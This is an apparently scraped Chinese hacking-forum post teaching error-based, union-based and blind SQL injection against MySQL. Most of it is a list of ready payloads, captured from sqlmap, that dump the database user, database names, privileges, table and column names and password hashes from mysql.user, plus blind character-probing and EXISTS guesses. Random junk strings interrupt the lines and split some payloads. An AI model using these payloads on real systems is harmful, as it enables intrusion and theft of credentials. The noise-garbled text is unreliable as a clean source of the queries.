放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
& _9 C, `" t% |7 Y# `
|: C: S- A& @6 w这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表$ K6 m- w9 X/ M8 c! Q% m
) ]- M9 S2 [: T q/ X: E' e" k分类标准 分类 备注* d& O' @8 `9 R" J `7 R4 a
按字段类型 整型注入,字符型注入
5 I1 o1 l4 ]& U' m, H. v. a0 c按出现的位置 get注入,post注入,cookie注入,http header注入 " w" B K# h* n* O
然而高级注入是这样的( o2 A; d1 h; S4 u" X0 d3 l( q% _
1 p4 B {) x) J- h2 ]
高级注入分类 条件& Q8 B3 F' L E' u3 h
error-based sql 数据库的错误回显可以返回,存在数据库,表结构1 o& u6 M9 ? ^. m
union-based sql 能够使用union,存在数据库,表结构! ]5 Q6 {' x* g5 g7 d, F
blind sql 存在注入
9 P3 j0 F/ X8 F* A7 e9 U! r8 ~# D我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
2 S0 E; }& F$ q6 M+ K( K 3 y3 d$ C1 p e$ n. W' M1 B* ^
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
+ [* A. m4 `6 N+ N' k7 Q/ ?
1 C' r2 @4 ]4 W6 M% R: V附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。. { [% c0 \2 V! m/ Q, C7 m& P
# E2 E2 X# m* d, j这里用mysql说明
4 o. f( X& A3 \% K2 I3 P& \ 1 T& R& s; _9 k) J* U! @( g O7 u" ~
e注入坛子里很多了,请看戳我或者再戳我
* h4 `& `2 K( ~$ z* i
' H! ]6 w( B1 t& f, o+ l3 Ou注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的$ G1 _' h* |6 d2 C
3 v6 g8 `9 ]. w0 O: q4 H1 J
获取当前数据库用户名5 t8 c* }8 A; J0 l. [8 z5 N
( l m3 E* d# CUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
! n6 K3 |% Y T j& V6 [AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
" i: M, z6 ]4 |L, NULL#
2 w8 B7 m+ Q* A8 v& g, w4 C注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。- K) g8 Y8 c |* |% y7 f, Q
2 r, K, p5 h3 A
获取数据库名# X$ R A; n; S2 X+ ]: w! J
+ f" H. ~3 m8 a% m: J, W. \" h( r
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#) |+ z7 }* E5 ]- I# u
获取所有用户名
- ^! c! J+ ]. V4 s* a $ l5 T K7 I H) p
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#( m& A! U4 C, A
查看当前用户权限0 R% T& \ r- y: |* N
* }/ \% @+ f$ v1 D L- t, OUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#+ [, r; r2 B3 D7 s d
尝试获取密码,当然需要有能读mysql数据库的权限5 L! V6 \3 e$ h$ i. ?) T+ H
1 T8 o& T! Q- N3 x! ^
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#7 m; ]' B# x# x5 i: v" H
获取表名,limit什么的自己搞啦, G+ N+ \0 U& f1 e4 p
* u$ H) T$ \ p8 EUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#! B+ Q) S) {. U. W4 R' n
获取字段名及其类型
, K8 ]2 U! Y2 YUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
9 u: o& I3 I" w$ k/ y2 j0 ~3 Z, A( J & F: ^. w- G% g6 c- y
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。5 T' w& e9 ^9 ]) i6 r$ }
; y& P# v" Z0 P如:% [' m( J) U7 ~8 @( h1 D9 d
获取当前用户名# v, ?6 R* Q$ |
% o" E1 j# ]! f& k1 n
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
/ s, r' W; S2 z5 d9 l9 h7 H0 U获取当前数据库7 o* b$ @. M5 C
7 f4 k6 J3 ~% R+ f
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
+ g. x6 r; L) M. m获取表名
: l4 D! w4 E) v
3 i6 `4 P# F& \, u% aAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51/ s1 r6 U% N/ W; v9 ^
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。6 h2 M4 w, J$ g) c
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
# E: D! `7 s! l& g- @, k爆表
9 @% g% @8 P0 _4 I. H4 v : F! g+ `, A0 `. C1 P3 M; C
AND EXISTS(select * from table)
2 _0 O5 q7 q! w3 u! ~7 x爆字段/ o: n! L& R; n3 X. _7 D( E# A3 t
5 O$ [( c7 p4 O( u2 ]
AND EXISTS(select pwd from table)& F- x" f5 {0 n- w% t% ?7 ?3 X- R2 D
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
0 ~9 d5 u+ u4 R( G! s - V) b0 l, u, h4 S& a
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
: g% v9 K+ u) C: L; }$ X( T |